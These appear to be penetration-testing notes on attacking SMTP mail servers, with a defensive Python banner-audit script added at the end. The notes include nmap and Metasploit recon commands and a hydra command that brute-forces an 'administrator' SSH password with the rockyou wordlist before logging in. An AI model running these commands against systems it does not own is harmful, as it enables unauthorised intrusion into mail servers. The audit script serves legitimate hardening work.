SMTP exploits

Attack tree

1 Port scan
2 Recon
    2.1 Detect version
    2.2 Enumerate users
    2.3 Identify possible exploits
3 Exploit
msf > search smtp
msf > search scanner name:smtp
msf > search exploit name:smtp -S excellent

Lucky trail

Run a port scan against the email server (first try 25):

# nmap -A -p 25 <IP address mailserver>

Detect SMTP version:

# msfconsole
msf > search smtp_version

Research Mail Transfer Agent (MTA). Things that can help:

  • When connecting, the greeting (reply code 220) will often spell out the MTA by name, e.g. Postfix

  • Common error messages are not strictly standardised: deliberately triggering an error (a syntax error, a non-existent address, …) will often return wording that is unique to one MTA

  • Many providers publish what they use (they almost have to, in order to hire specialists)

Enumerate users:

msf > search smtp_enum

Crack SSH password:

# hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV <IP address mailserver> ssh

SSH into the server as the user:

# ssh administrator@<IP address mailserver>
The Simple Mail Transfer Protocol (SMTP) is the Internet protocol for sending email. SMTP uses TCP port 25.

There are eight basic categories of SMTP exploits:

  • Cleartext sniffing of authentication, email messages, and attachments; banner grabbing

  • Relaying spam and phishing

  • Email account enumeration

  • Brute forcing account passwords

  • Buffer overflows for arbitrary code execution

  • Privilege escalation

  • Denial of service

  • Authentication bypass
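As an added example (not from the original notes), a Python self-audit that reads the 220 greeting and the pre-STARTTLS EHLO reply of a mail server you administer and flags what the recon section and the category list above describe: MTA name or version disclosed in the banner, AUTH offered without STARTTLS (cleartext credentials) and VRFY/EXPN advertised (account enumeration). The sample replies, hostnames and the MTA name list are constructed assumptions.

```python
# Added example (not from the original notes): self-audit of an SMTP server's
# 220 greeting and EHLO reply for the weaknesses listed above. Sample replies
# below are constructed.
import re
import smtplib

MTA_NAMES = ("postfix", "exim", "sendmail", "microsoft esmtp", "qmail")
# version-looking token (4.96, 8.15.2) that is not part of an IP address
VERSION_RE = re.compile(r"(?<![\d.])\d+\.\d+(?:\.\d+)?(?![\d.])")


def parse_ehlo(raw: str) -> dict:
    """Map a raw EHLO reply ('250-KEYWORD params' lines) to {KEYWORD: params}.
    The first 250 line carries the server hostname, not a capability."""
    lines = [line[4:].strip() for line in raw.splitlines() if line.startswith("250")]
    return {k.upper(): p for k, _, p in (x.partition(" ") for x in lines[1:])}


def assess(greeting: str, features: dict) -> list:
    """Findings for one greeting plus its (pre-STARTTLS) EHLO capabilities."""
    findings, low = [], greeting.lower()
    findings += [f"greeting discloses MTA: {n}" for n in MTA_NAMES if n in low]
    if VERSION_RE.search(greeting):
        findings.append("greeting discloses a version number")
    kw = {k.upper() for k in features}
    if "STARTTLS" not in kw:
        findings.append("STARTTLS not offered: whole session is cleartext")
        if "AUTH" in kw:
            findings.append("AUTH offered without STARTTLS: passwords in cleartext")
    findings += [f"{k} advertised: enables account enumeration"
                 for k in ("VRFY", "EXPN") if k in kw]
    return findings


def probe(host: str, port: int = 25, timeout: float = 10) -> list:
    """Audit a live server you own: smtplib's connect() returns the 220
    greeting and esmtp_features holds the parsed EHLO keywords."""
    with smtplib.SMTP(timeout=timeout) as s:
        _code, greeting = s.connect(host, port)
        s.ehlo()
        return assess(greeting.decode(errors="replace"), s.esmtp_features)


# constructed samples: a chatty unhardened server next to a hardened one
LEAKY_GREETING = "220 mail.example.test ESMTP Exim 4.96 ready"
LEAKY_EHLO = "250-mail.example.test\r\n250-SIZE 52428800\r\n250-VRFY\r\n250-AUTH PLAIN LOGIN\r\n250 HELP"
HARDENED_GREETING = "220 mail.example.test ESMTP"
HARDENED_EHLO = "250-mail.example.test\r\n250-STARTTLS\r\n250-SIZE 52428800\r\n250 8BITMIME"
```

Run `probe("mail.example.test")` against your own server to get the same list of findings for a live banner.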